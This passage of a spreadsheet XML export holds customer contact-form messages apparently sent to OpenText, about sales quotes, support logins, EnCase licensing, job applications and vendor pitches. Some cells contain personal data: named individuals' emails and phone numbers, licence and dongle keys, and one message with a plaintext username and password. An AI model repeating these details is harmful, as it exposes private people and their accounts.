A very good morning to you. I am Airudin from Citrix’s System procurement team. I am reaching out to you as I would like to find out more on the services that you provide. _x000D_
_x000D_
We understand that your firm produces analytics products that may fit our business requirements and I have an internal stakeholders in US region which I am supporting who is looking for Customer Feedback Management (CFM) / Text Analytics / Natural Language Processing software application. Are you the correct person whom I ask for further details on this._x000D_
_x000D_
Just to give more insights on the requirements._x000D_
Ideally, my stakeholders are looking for a solution that includes the below features, and are looking forward to understanding what your company is able to offer._x000D_
_x000D_
•              Ability to build contextual classification text models within platform_x000D_
•              Natural Language Processing_x000D_
•              Out of the box Industry classification templates_x000D_
•              Topics and clauses parsed individually from sentences, verbatims, and articles_x000D_
•              Sentiment Score (linear and variable. Not limited to 3) associated with each theme, topic, word, or phrase, not limited at the record level. Proximity and contextual. Ability to tune for business need_x000D_
•              Level of Effort classification templates_x000D_
•              Emotion classification templates_x000D_
•              World awareness classification templates_x000D_
•              Theme detection _x000D_
•              Ad hoc uploads_x000D_
•              Robust reporting capabilities_x000D_
•              Multiple source dashboard reporting (text classification, structured data, external data) _x000D_
•              Integration capabilities (continual / API feed) _x000D_
•              Website robot configuration and integration _x000D_
•              Multilingual _x000D_
_x000D_
If you are able to provide these services, I would like to find out on your interest to participate in our upcoming Request for Quotation for these services. Should you have any further querie</t>
  </si>
  <si>
    <t>I am interested in Encased Forensic Tool. Do you have a moment to chat?</t>
  </si>
  <si>
    <t>I need to change my billing info but cannot login for some reason.  Help please.</t>
  </si>
  <si>
    <t xml:space="preserve">I can no longer log into my right2fax email account i have requested a reset password i am using the new address:myportal.opentext.com/XddsPortal/#DashboardMainPlace but can not get into the email portal to see any of my emails confirmation. I need help. _x000D_
</t>
  </si>
  <si>
    <t>I need a system that will provide access to files such as CAD, JPEG, PNG that normal high level Access Azure and SharePoint will not restrict down to local and external access to maybe a DOD/NIST compliance level. FTP is not preferred GUI is. Sending a single use link in an email or chat is preferred.</t>
  </si>
  <si>
    <t>Need to talk with someone in sales re Documentum</t>
  </si>
  <si>
    <t>Would like to get in touch to see, how OpenText BRMS could be applied within the mobile app development space.</t>
  </si>
  <si>
    <t>Can you tell me what the most updated Enterprise Scan software there is available?  We have Version 10.5.0 (Build #491).  Is this the most up to date version available?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Quote Request_x000D_
_x000D_
I would like a quote for an on-premise fax server solution that can support at least 8 concurrent connections via SIP trunk, approximately 1200 users, and AD integration.</t>
  </si>
  <si>
    <t xml:space="preserve">la entrega es electrónica, que tiempo de entrega </t>
  </si>
  <si>
    <t>Need Fax training-New Hire</t>
  </si>
  <si>
    <t>We have at least one law firm that may be interested in your product, and I'd like to see about scheduling a demo._x000D_
_x000D_
If you have any questions, please reach out to me by email._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>I would like your cost packages emailed to me for your fax2email service</t>
  </si>
  <si>
    <t>I recently joined in Toll group. Going to work on Captiva 7.1. I am trying to create an account for OPENTEXT support.  Currently Natasha Handa &lt;Natasha_Handa@infosys.com&gt; [Natasha Handa &lt;Natasha.Handa@tollgroup.com&gt;] &amp; Tristan Cruickshanks &lt;Tristan.Cruickshanks@tollgroup.com&gt; are working in our team , I am going to replace their role after few days.</t>
  </si>
  <si>
    <t>Need access to "My Support" portal.</t>
  </si>
  <si>
    <t>update 8.08 will not open in forensic mode, only acquisition,  8.05 works normaly,.</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to as the Retail and Events Manager for Four All Ice Cream, a Kitchener-Waterloo based natural, locally sourced ice cream company. We offer catering services for events and special occasions and have partnered with multiple different businesses across the Waterloo Region to bring ice cream to their employees. How cool would it be for Open Text, a fellow Kitchener-Waterloo company, to provide Four All Ice Cream at a company event or simply for employee appreciation at your Waterloo office? _x000D_
_x000D_
Four All Ice Cream is dedicated to using the best natural ingredients and building partnerships with local growers, farmers, and business owners.  Through this, we create fresh and seasonal flavours that support local and showcase the best of Kitchener-Waterloo region. Being mindful to ensure there would always be a choice for all ice cream lovers, four flavour categories were created: CLASSIC - Timeless. Understated. Constant., VEGAN - Mindful and Delightful, CHILDHOOD - Throwback Goodness, FOODIE - Adventures in Ice Cream._x000D_
_x000D_
Our ice cream cart is self-contained and we transport it wherever we need by trailer. In the cart, we can display up to four flavours at a time but have the capacity to bring up to 11 tubs to serve, depending on your event. You can choose the flavours yourself or leave it to us to decide. Cups, spoons, cones, and napkins are all provided as part of our service. _x000D_
_x000D_
I look forward to hearing from you for ice cream wants and needs for any upcoming events. _x000D_
_x000D_
Cheers,_x000D_
_x000D_
Hannah </t>
  </si>
  <si>
    <t>I am having an issue with Teleform that I would like to troubleshoot but I don't have access to your knowledge base. Do you have a publicly available knowledge base or could you create an account for me to access the KB?  Thanks</t>
  </si>
  <si>
    <t>Warm Greetings!_x000D_
_x000D_
It is great to see that how Open text believe in developing safe and abundant society for its social responsibility. We are looking for a partner who understands the grass root problems and is dedicated towards a better future of underprivileged children in need of support and care. Together we can make a difference in the lives of children who are deprived of their rights. That is why, it will be a pleasure for us to explore any possibility of partnership between Open text and CHETNA NGO._x000D_
_x000D_
CHETNA is a grass root Indian organisation working for the empowerment of underprivileged children, especially girl child in Delhi and neighboring states. We strongly believe that children are on the streets not by choice but by circumstances. An integral component of CHETNA is our newspaper Balaknama, which has won accolades across the world and grabbed a space in Limca book of records. Our second record was also set by these children on 12th April, 2013. _x000D_
_x000D_
Thank you so much for taking your time to read this mail and we would be happy to meet or talk to you at your convenience or answer for further query. We look forward to partner with you and begin a new journey with it in place. _x000D_
_x000D_
Hoping for your partnership</t>
  </si>
  <si>
    <t>Hello! I'm adding a custom piece of sottware between our Epic Systems implementation and RightFax. I need documentation on FCL. Please send or point me to a PDF of your OpenText RightFax 10.5 Integration Module Guide. Thank you!</t>
  </si>
  <si>
    <t>We are well into a project looking at Call Recording software, where we have had product demo's, RFI/RFPs, product Reference Calls....  In doing so, your company/product name was come up, so before we make a selection, we would like to discuss what your product offers, if it would satisfy what we are looking to accomplish, if it fits with our technology desires, etc.  We are looking for a quick call to discuss your offerings, as well as looking to see if you would be willing to address a RFI/RFP we have currently available.  If this is of interest, please reach out and we can see how your organization may be able to address our needs.  Thank you   Dennis</t>
  </si>
  <si>
    <t>Hello,_x000D_
In November 2013 we purchased a copy of report builder 5.2. We can no longer activate it with the codes supplied. We haven't used it in a while._x000D_
_x000D_
I'm hoping someone can help get it going again._x000D_
_x000D_
Thanks,_x000D_
Devon</t>
  </si>
  <si>
    <t>What are Open Text's capabilities in Quality Management System, Document Control/Management, and Training?  Do you offer information via presentations (slide decks), or demonstrations (teleconferences or onsite visits)?  I would also like pricing information with the different modules.</t>
  </si>
  <si>
    <t>I have a potential government customer needs to know if this is 508 compliant and if you have a VPAT available.</t>
  </si>
  <si>
    <t>_x000D_
GOOD MORNING._x000D_
_x000D_
BUENOS DIAS._x000D_
_x000D_
I HAVE A DEVELOPER LICENSE (UNIFY VISION DEVELOPMENT ENVIRONMENT 8.1A)  AND TWO LICENSES VISION FOR FINAL USERS,  BUT THIS YEAR EXPIRES. I NEED TO RENEW THEM, COULD YOU HELP ME PLEASE?</t>
  </si>
  <si>
    <t>I am working on a Digital Business Transformation for a client and would be proposing CMS. I would like to see a product demo to see how closely does the product matches to the needs of my client.</t>
  </si>
  <si>
    <t>Would like to discuss fax server solution to integrate with our NextGen EHR system.</t>
  </si>
  <si>
    <t>Within the Open Text viewer, within the Document toolbar item, there is a Send Document option.  I'd like to know where the attachment name that is attached when we use that can be changed.  A number of users have their attachments named "how are you".  We want something a bit more meaningful.  thanks</t>
  </si>
  <si>
    <t>account information update</t>
  </si>
  <si>
    <t xml:space="preserve">Buenas tardes, tenemos la cuenta activada para acceder a la opción de soporte o apertura de tickets de soporte pero cada vez que intentamos acceder a estas opciones nos sale un mensaje de error: No Access -  We're sorry, your account does not grant you access to this resource. Luego nos requiere un mail de confirmación pero entramos en bucle, no podemos pasar de esta opción. El mensaje es: "Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
Request Confirmation email"..._x000D_
Parece que permite confirmar pero volvemos a tener que repetir todo el procedimiento sin conseguir acceder. _x000D_
Gracias. </t>
  </si>
  <si>
    <t xml:space="preserve">trabajo escolar </t>
  </si>
  <si>
    <t>I would like to be a part of Opentext, I would like to learn Opentext tools. Can I know the process? I do have a knowledge on Java. Please help me.</t>
  </si>
  <si>
    <t>Our company needs a w-9 form for Opentext.  Please email it to me at _x000D_
rhenderson@americanriskservices.com</t>
  </si>
  <si>
    <t>I am one of the INFOSEC officers in OPCW and planning to have ENCASE training. May I kindly request a quote for the Encase Passport?</t>
  </si>
  <si>
    <t>i cannot log in to the support web site. I tried to reset my password, but it failed. I'm looking for instructions to enable the web services api for 10.6.3.</t>
  </si>
  <si>
    <t>Please advise what is the cost per person to attend Enterprise World Vienna for Partners in Advancing Markets?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Looks like magellan dot com domain is not active and it redirects me to opentext dot com. We would like to buy this domain if you don't use._x000D_
_x000D_
We are software development company from Istanbul, called Macellan._x000D_
_x000D_
I waiting for you response._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Information on EnCase dongle renewal under new Opentext structure - Dongle is currently out of support and support needs to be renewed</t>
  </si>
  <si>
    <t>I am trying to reset my password, however I am getting an error saying that the password reset has failed. It does not give a reason for this.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Hope all is well!_x000D_
_x000D_
We are a group of Hyper Island students currently researching about business innovation._x000D_
_x000D_
We are therefore reaching out to different companies to hear about their experiences with in this field. We are looking to get a better understanding of how you as a company address and work with business innovation. If it would be possible it would be nice to meet and sit down or to set up a Skype meeting for a short interview? The purpose of this is for us to get insights meaning that any potential information that you share would be dealt with confidentiality. _x000D_
_x000D_
Looking forward to hearing from you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Query regarding Vendor Invoice management solutions available at OpenText (needs to be integrated with SAP )._x000D_
awaiting reply._x000D_
</t>
  </si>
  <si>
    <t>Interview</t>
  </si>
  <si>
    <t>Hej_x000D_
_x000D_
Jeg skriver på vegne af IDEMIA Danmark. Vores faktura addresse skifter fra 15. Januar. Vi vil gerne sende jer et informerende brev om hvordan vi gerne vil modtage jeres faktura fremover. _x000D_
Venligst besvar denne mail med navn og email addresse på jeres debiter bogholderi, og vi vil sende brevet til dem. _x000D_
_x000D_
På forhånd tak :) _x000D_
_x000D_
Med venlig Hilsen_x000D_
_x000D_
Mette Jessen _x000D_
IDEMIA Danmark</t>
  </si>
  <si>
    <t>Camberley</t>
  </si>
  <si>
    <t>Request for new License key including XMLIN, XMLOUT, Story Teller, FTP Out, Redirect Out..._x000D_
Shortly for all Modules we are licensed with our Infor M3 (Release 13.4) and Streamserve Version 5.6.2.</t>
  </si>
  <si>
    <t>I want to know the system and browser requirements for end users using exstream empower.</t>
  </si>
  <si>
    <t>Please remove me from your email list. thank you</t>
  </si>
  <si>
    <t>Contac me</t>
  </si>
  <si>
    <t>Hi there, we are using your Opentext LearnFlex system (hosted by you). As part of our BI projects, we need to pull results data from the system on a daily basis to go into our reporting dashboards. I'd like to know if there's a LearnFlex API that we can query to retrieve data and could you link me to the resources._x000D_
_x000D_
Cheers,_x000D_
Matt</t>
  </si>
  <si>
    <t>We would like to inquire reagarding EnCase Forensic and EnCase EDR</t>
  </si>
  <si>
    <t>I want to know the price of the Open Text Gupta Dev. Tools</t>
  </si>
  <si>
    <t>Dear Sir/ Madam,_x000D_
My name is Selina from VT Plus import export and Investment Company Limited, locating in Hanoi, Vietnam. Our company does business of supplying security vehicles and equipment for Law enforcement forces of Vietnam. We have good relationships with different police organization like Investigation Police, Drug Police, Mobile Police, Fire Police, Anti-Smuggling Police ...  _x000D_
_x000D_
We are conducting new project for Ministry of Public Security, which requires Encase forensic software with specs requirements as below:_x000D_
  - Collecting information from devices quickly_x000D_
  - Searching for potential evidence with disk - level analysis_x000D_
  - Collect and check data from laptop, smartphone, tablet and other digital forensic software._x000D_
_x000D_
Please kindly check it and send me quotation and catalog of your software as soon as possible so that I could share with you other project information._x000D_
I am looking forward to hearing from you soon._x000D_
Thank you and Best Regards.</t>
  </si>
  <si>
    <t>My name is Clint Moore and I'm a local real estate expert in Pasadena. Does your HR department offer any personal relocation assistance for new hires and/or transferred employees?</t>
  </si>
  <si>
    <t>Hello! How can I download EnCase Forensic Imager? I registered, but I do not find links to download.</t>
  </si>
  <si>
    <t xml:space="preserve">               More than likely this is an odd request, so I am going to attempt to just get to the point and not waste too much of your time. Assuming you are still reading this I want to make it clear, that I am neither a company, part of an organization nor a salesman. Basically I was wondering if your organization would be interested in a configuration for a new type of software data storage that may be capable of sorting data faster as well as retrieving files faster than current programs. So would you be interested in looking over a short description of the concept? If requested I would be more than willing to sign a NDA. _x000D_
            Yay or nay I hope you will indulge me a response, thank you for your time and have a good day. _x000D_
</t>
  </si>
  <si>
    <t>Need to setup account for our new company for catalog service QRS.</t>
  </si>
  <si>
    <t>I used to work for document sciences, that was adquired by EMC, before they were adquired by Dell.  I left Opentext after you bought the Documentum practice from EMC.  I have an old laptop that was left over from that period and want to return it.  Where should I send it?</t>
  </si>
  <si>
    <t>I am a new Software Asset Manager with Texas DFPS and I'd like to clarify the licensing requirements for two of your products. RightFax Client 10 and RightFax Product Suite 10.5. Do these require individual license per user or installation, or are they included with the licensing of the actual server product?_x000D_
Thank You</t>
  </si>
  <si>
    <t>Upgrading options from Verity Teleforms.</t>
  </si>
  <si>
    <t>I need to find a product that will do a forensic backup of an iPhone.  A colleague suggested I see if your company offers any solutions that would do this.</t>
  </si>
  <si>
    <t>I need a contact for someone in Support and Maintenance for a customer.  State of Louisiana Office of Technology Services - Matthew Vince</t>
  </si>
  <si>
    <t>interested in switching from scantron</t>
  </si>
  <si>
    <t>For our staff of consultants, we would like to be able to generate their resumes based on stored resume content with the ability to exclude/include certain information.  Is this something your product could help us with?</t>
  </si>
  <si>
    <t>I need a PDF/Post Script module license added.</t>
  </si>
  <si>
    <t>I'm trying to open the knowledge base to get some information on installing Teleform Reader on a server.</t>
  </si>
  <si>
    <t>Download encase 8.08._x000D_
I have encase dongle G3002093811 and need to download encase 8.08_x000D_
Thanks!</t>
  </si>
  <si>
    <t>AAA內容物AAA</t>
  </si>
  <si>
    <t xml:space="preserve">I need to know if we have a support contract. We have lost our admin password for the service and need to wipe it out and reset it, thanks. </t>
  </si>
  <si>
    <t>Cannot reset password with the link</t>
  </si>
  <si>
    <t>Require support with current Actuate cluster need to know if we can temporary spin up an extra node due to burst traffic</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to reset the password. This is the information I currently have: Username- ST332A, Password-Garden108, Network ID - ST332_x000D_
</t>
  </si>
  <si>
    <t>Is this something that we could use in a 3-state firm with 6 offices and 170 people and what is the cost?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi we are license holders EnCase forensic 7 Nr.  G2002082919, but we do not have the software; Therefore we ask you how to download the software EnCase 7. Thanks Yours sincerely </t>
  </si>
  <si>
    <t>I am trying to upgrade our existing ApplicatonXtender server and my trial subscription has expired.  I need to extend my 30 days trial license.  I do not want to activate my real license till I get all the bugs figured out.  Tech support said I need to contact sales.</t>
  </si>
  <si>
    <t>Need quote for new DAM. Has to integrate with Drupal and Asana.</t>
  </si>
  <si>
    <t>I am currently looking for a permanent position of driving a forklift</t>
  </si>
  <si>
    <t xml:space="preserve">Hi!  I am looking to get a price quote via email for Qty.1 Guidance Software	EnCase Forensics v7.  This is in support of a project for the Federal Govt. Please contact me with questions.  Thanks!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently on the encase 7.13.  We are looking to upgrade to the latest version. Are we eligible to upgrade to the new version?_x000D_
_x000D_
Our Key No : G2002038857_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I need an offer for a Fax server solution for a Cisco Business Edition 11.5 with 100 phones._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Interested in Data intake solutions</t>
  </si>
  <si>
    <t xml:space="preserve">My Support is not working for me. Continue to update my account and logging in but can get to the knowledge base or anything where to ask questions. Trying to resolve several issues we're having AX 16.3. Can you help with the registration so I can move forward? </t>
  </si>
  <si>
    <t>Hi, we are a partner/customer of yours - would like to know if your fax to email numbers (we have some from you) are IP based so won't be terminate when BT kill off ISDN. We have 500+ ISDN fax to email numbers in use. Haven't had any account management contact for some time so don't know who to ask. Many thanks.</t>
  </si>
  <si>
    <t>Need assistance in moving Right Fax Services to new Server._x000D_
Existing Server Failed. We are at 10.6.</t>
  </si>
  <si>
    <t>We're currently shortlisting vendors for a text analytics project. We would like to find out if OpenText would be a suitable candidate. _x000D_
_x000D_
We will be working with unstructured text (letters) which will not follow a template. The documents will need to be classified into custom classification groups. We will then require entity extraction where those entities will differ per classification group. Throughout the lifetime of the project (2 years) the number of classification groups and entities may increase. We also will need to be able to develop the solution independently in-house (within Deloitte), therefore we will be looking to be trained on the tool._x000D_
_x000D_
We need to make decisions as soon as possible so would be great to schedule some meeting at your earliest convenience. We've got some availability between 11AM and 12:30PM tomorrow if you can accommodate a meeting that soon.</t>
  </si>
  <si>
    <t>Trying to register for January 21, 2019 class 3-3710 OpenText Exstream Communications Server.  It keeps saying "Web Server Error".</t>
  </si>
  <si>
    <t>I need to know if Opentext VIM supports hebrew</t>
  </si>
  <si>
    <t>Data Center (IT Asset) Decommissioning services for OpenText in conjunction with your Google Cloud Platform initiatives._x000D_
_x000D_
How might Atomic Onsite become an OpenText vendor for such services, please?_x000D_
_x000D_
Thank you for your help!</t>
  </si>
  <si>
    <t>We are working with a customer using your livelink software and they are asking us if we can find and classify sensitive information within your product.  They told us it is backed by a Oracle database but that only stores the metadata.  How do you store the customer documents?  Any idea on id we would be able to search and classify the documents with in the tool?  Thank you for your time.</t>
  </si>
  <si>
    <t>Hello, our company is currently looking at various records and archive management systems so that we may implement a solution here at PortsToronto. I wondered if someone could contact me regarding OpenText Records Management so that I could discuss the features we're looking for and see if it might be appropriate to set up a demo. Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Isatech is a Microsoft partner delivering business solutions such as Dynamics Nav, Dynamics AX and Dynamics 365._x000D_
I'm working on a lead for a customer who wants to integrate Streamserve with Dynamics 365. It seems that you have some solutions, so i would be pleased to get information concerning the solutions you provide._x000D_
_x000D_
Best regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesing one license quote for Captaris OpenText Document Server, Alchemy Edition for_x000D_
_x000D_
Marian E Drake_x000D_
marian.e.drake@uscis.dhs.gov_x000D_
(202) 272-8201_x000D_
_x000D_
Please contact me for this information and can you also CC my direct email at dennis.n.nelvis@uscis.dhs.gov </t>
  </si>
  <si>
    <t>Can not open Encase in the licensed "Forensic" mode.  I have the certs installed properly.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I work on assignment for renowed company who wants to split their business._x000D_
Would it be possible to get very draft price estimation for OpenText Suite for Oracle for 50 users (incl. annual fee)? _x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Best Regards,_x000D_
Robert Wereszczynski _x000D_
</t>
  </si>
  <si>
    <t>Hi: I am interested to learn your demo regarding to the PO clouded based EDI and purchasing requisition intake. Can you please have someone contact me ?_x000D_
Bowen Liu</t>
  </si>
  <si>
    <t>How do I pay and submit documents for recert? Is there a link or person I should be contacting?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sales,_x000D_
_x000D_
We have requirement on the items below:_x000D_
_x000D_
1. 10TB HGST, Seagate or WD Enterprise-Class SATA/SAS Hard Drives (150 Pieces)_x000D_
_x000D_
2. 12TB HGST, Seagate or WD Enterprise-Class SATA/SAS Hard Drives (150 Pieces)_x000D_
_x000D_
Location for use: New York._x000D_
Project: We are using these items in our new Annex in BRONX NY 10454._x000D_
Items are expected to be delivered within 10 business days (if applicable)._x000D_
_x000D_
Kindly send us a quote on the items above and the quantity listed._x000D_
_x000D_
Sincerely._x000D_
_x000D_
Royce._x000D_
_x000D_
Royce Williams_x000D_
The University Of Vermont,_x000D_
360 Waterman Building,_x000D_
Procurement Services,_x000D_
Burlington, VT 05405._x000D_
Tel : +1-802-294-3441 </t>
  </si>
  <si>
    <t>NX user is unable to create a Stp file.</t>
  </si>
  <si>
    <t>Working for a client, a leading US based apparel brand, looking out for cloud storage – secure file transfer, content management provider; having service capabilities to offer 1,000+ users</t>
  </si>
  <si>
    <t>PURCHESES THE DOCUMENTUM SOFTWARE FROM EMC2 IN 2016 AND WE NEED SUPPORT ACCOUNT TO SOLVE SOME PROBLEM HOW CAN  OPEN SERVICE REQUEST WITH OPEN TEXT TO SUPPROT AND SOLVE SOME PROBLEM?</t>
  </si>
  <si>
    <t>Good Morning, I am looking to get a quote for support of our current licenses, as well as what it would cost to update our software to the current release version.  Thank you!  Mindy Pierman</t>
  </si>
  <si>
    <t>Hello_x000D_
We are in a preparation phase of implementing SAP archival strategy for one of our global customer. So we need some information regarding the use of open text as the storage medium.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently running a version of IQ Intraspect on Vignette 8.0.2 and I would like to review possibilities of upgrading. In addition I would like to discuss this with the Business manager for my company account. </t>
  </si>
  <si>
    <t>Required OTIC trail version for exploring tool</t>
  </si>
  <si>
    <t>I'd like to contact with open text support and I was have an account on DELL-EMC _x000D_
my details Dina Abdelaziz ,Engineer_x000D_
Head Quarter 3th Al-Alfy straat Cairo _x000D_
I want someone contact me (arabic speaker)</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
We've been approached by Phoenix Medical to help streamline their invoicing processes. As part of this we're going to be extracting data from a number of suppliers who can only send in PDF documents and send it to them in a tradacom format._x000D_
_x000D_
They've asked if we can possibly send it via your VAN. Their ID is 5013546112903. Are you able to indicate how we can send documents to yourselves in this way? Are there any charges involved with engaging with this process?_x000D_
_x000D_
Many thanks and kind regards,_x000D_
_x000D_
Taigh Hawkins</t>
  </si>
  <si>
    <t>I wanted to know about the trainings and certifications available for OT Exstream 16.</t>
  </si>
  <si>
    <t>Purchase inquiry - we would need X-terminal software emulator "Open Text Exceed" ver. 15</t>
  </si>
  <si>
    <t>Kckvkvkv</t>
  </si>
  <si>
    <t>VG</t>
  </si>
  <si>
    <t>aaa明天会更好aaa</t>
  </si>
  <si>
    <t>KI</t>
  </si>
  <si>
    <t xml:space="preserve">Help </t>
  </si>
  <si>
    <t>Buy Licenses</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm planning my trip to Vienna to attend the OTEW. Could you please send me a preliminary agenda that I can decide, when to arrive and when to leave?_x000D_
Thanks in advance_x000D_
Martin</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am employee of CGI company that works for Total, as part of an application maintenance contract._x000D_
We would like to proceed with the installation of Opentext and in particular the following products:_x000D_
• OpenText Collection Server - For LINUX _x000D_
• OpenText Collection WebTop Suite_x000D_
• Files v10.3_webtop.iso and v10.3_server_rhelx86_b143.iso_x000D_
Total has a maintenance contract 0015007503 covering this request. Could you provide us with the sources of software installation, as well as associated licenses and possibly technical support if necessary?_x000D_
This request follows a first email exchange between Cedric PILARSKI (Total) and Roberto Roosevelt (Opentext)._x000D_
Regards,_x000D_
Fabien Degeilh_x000D_
---------------------------------------------------------------------------------------------------------------------_x000D_
Bonjour,_x000D_
Je fais partie de la société CGI qui travail pour Total, dans le cadre d’un contrat de maintenance applicative. _x000D_
Nous souhaiterions procéder à l’installation d’Opentext et notamment des produits suivants :_x000D_
•	OpenText Collections Server - For LINUX_x000D_
•	OpenText Collection WebTop Suite_x000D_
•	Files v10.3_webtop.iso et v10.3_server_rhelx86_b143.iso_x000D_
Total possède un contrat de maintenance 0015007503, couvrant cette demande. Pourriez nous fournir les sources d’installation des soft, ainsi que les licences associées et éventuellement de l’assistance technique si nécessaire ?_x000D_
Cette demande fait suite à un premier échange par mail entre Cedric PILARSKI (Total) et Roberto Roosevelt (Opentext)._x000D_
Cordialement,_x000D_
Fabien Degeilh</t>
  </si>
  <si>
    <t>I am not able to access My Support portal. OTCS Ticket 4063452 is pending</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Please can I recieve a copy of the 'how to install Encase Certificate files' document? It is not available through mysupport, and the links my customer has for this document no longer work._x000D_
_x000D_
My customer would also like to collate all of their current licences to be associated to one specific email address._x000D_
New licence email address: ccu@ersou.pnn.police.uk_x000D_
_x000D_
Associated licence keys: X100008116483, X100008116469, X100008116456, X100008116284, X100008103580, X100008116241, G3002089412, G3002089411, G3002089410, X100008075214, X100008075168, G3002086502._x000D_
_x000D_
Please can you advise on how this would be done?_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
Elliott</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
J'aimerais connaitre les tarifs de votre solution Customer Communications Management (CCM) Software._x000D_
_x000D_
Merci</t>
  </si>
  <si>
    <t>As part of an evaluation of Scan/Capture solutions I require an index pricing of your Capture Center product for the following use case:_x000D_
_x000D_
IntlSOS will be deploying an Enterprise OCR Scan/Capture system.  In the first phase this system will be used for Invoice Processing by our Global Finance Department which will have 100 nodes processing 60,000 to 70,000 invoices per year with the actual application being managed by 5 to 10 Named Users._x000D_
_x000D_
After successful implementation of the system it is planned to roll it out to our other business lines for:_x000D_
_x000D_
•	The extraction of data from Lab Reports for insertion into an EMR_x000D_
•	The extraction of performance data from paper/electronic reports for processing by an Analytics Engine_x000D_
•	The processing of written time cards_x000D_
_x000D_
Note that this is an evaluation phase where we will identify and short-list potential providers.  I thank you in advance for your timely response._x000D_
_x000D_
Regards,_x000D_
_x000D_
Michael Sienkiewicz</t>
  </si>
  <si>
    <t xml:space="preserve">We have a customer case for rightfax now and are frequently asked for availability._x000D_
We are distributers in the Nordics on imiging SW. Could you provide offers from case to case? </t>
  </si>
  <si>
    <t>Dear OpenText Team,_x000D_
_x000D_
i have some questions regarding the ECM - is there also an integration with Microsoft Dynamics CRM? If so, do you have any references or best cases to show? :) _x000D_
_x000D_
Would appreciate your feedback! Thanks and have a nice day,_x000D_
Philipp</t>
  </si>
  <si>
    <t>Need enterprise solution cost for a client. Content management system. ECM Integration - OpenText Extended ECM Platform_x000D_
Do share the details on my work email ASAP</t>
  </si>
  <si>
    <t>Dear support,_x000D_
We have a issue with TurboX client on windows 7. When we try to start our application we see next warning: Unable to connect to node because the node's fingerprint is incorrect. On windows 10 all working normally.</t>
  </si>
  <si>
    <t>Hi, I have a Encase dongle key with activate._x000D_
Dongle ID : G2002046671_x000D_
EXP date : 12/02/22_x000D_
_x000D_
So, I tried download Encase newest package but I cannot approach 'My support' menu._x000D_
Please let me know the way or registered account information for this dongle key.</t>
  </si>
  <si>
    <t>please check your email "encasecertification@opentext.com"_x000D_
I send you my application about Ence certification a few days ago._x000D_
but my email is still unchecked and I didn't hear anything from you_x000D_
I need to get Ence certification as soon as possible._x000D_
please send me your reply. _x000D_
I am eagerly waiting for your reply.</t>
  </si>
  <si>
    <t>URGENT!_x000D_
Please send me pricing info regarding OpenText Document Management eDOCS Edition (eDOCS DM) and OpenText Contract Center for small law firm (less 10 attorneys) based in Mx City.</t>
  </si>
  <si>
    <t>Québec, 9 janvier 2019_x000D_
_x000D_
À qui de droit,  _x000D_
 _x000D_
Je fais présentement un baccalauréat en génie logiciel à l’université Laval. Je suis très intéressé par les activités de votre entreprise et je souhaite travailler avec vous. _x000D_
_x000D_
Mon plus grand accomplissement cette année fut dans l’industrie du web où j’ai eu la chance de faire mon stage. Mon stage c’est fait dans le département de recherche et développement chez WAI Inc. pendant la session d’été 2018. Il consistait à participer au développement d'une application sur l'assistant Google appliquée au domaine du commerce, ainsi qu'au développement d'un système informatique permettant la tenue d'encan monétaire pour la vente de bloc de publicité. Le travail est fait dans un environnement Agile où j’ai dû, pour chaque incrément de développement, analyser les requis de développement, préparer des estimations de temps, modifier et entretenir le logiciel, le tester et le déployer sur un serveur._x000D_
_x000D_
Pendant l’été 2017, j’ai fait un stage chez GSI Électronique dans le quartier industriel de Saint-hubert. GSI Électronique est sous la bannière AGCO, larder mondiale en agriculture. Cette compagnie est spécialisée dans le développement et la fabrication de contrôles électroniques pour la production animale. Le produit Edge sur lequel j'ai travaillé est un système de contrôleurs redondants intégrés avec accès à distance et capacité de traitement de données statistiques. Comme le produit Edge est sur le marché depuis plusieurs années, le travail développement consistait surtout à ajouter des fonctionnalités et à corriger des bugs. J’ai été intégré dans une équipe d’ingénierie multidisciplinaire composé d’ingénieurs logiciels, informatique, électrique et d’autres professionnels du domaine de l’informatique. _x000D_
_x000D_
Durant l’été 2016, j’ai rejoint une équipe de passionnés chez Phytronix Technologies Inc. à Québec. J’ai eu la chance de participer au développement d’interfaces, à la programmation de microprocesseur et au développement de p</t>
  </si>
  <si>
    <t>Hello I would like to know where i can obtain a Right Fax 16 Client/Workstation Installation Guide. Our hospital will be upgrading to RightFax v16 and i would like to get details on how to create a silent "SCCM" type installation parameters for the clients.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern, _x000D_
_x000D_
I am leaving Three Wire Systems on 15 January 2019 and need to switch this account to another employee, Cindi Clark (cclark@threewiresys.com).  Could you please walk me through the process to do that? _x000D_
_x000D_
Thanks, _x000D_
R, _x000D_
Katie </t>
  </si>
  <si>
    <t>Universal Webflow has been assigned an OpenText Professional Services (North America) contract and we need to request the contact email addresses of the appropriate managers for Content Suite and SAP services. This is so that we can inquire about upcoming project requirements and submit consultant resumes who fit the desired profiles._x000D_
Thank you, _x000D_
_x000D_
Mark Huffman</t>
  </si>
  <si>
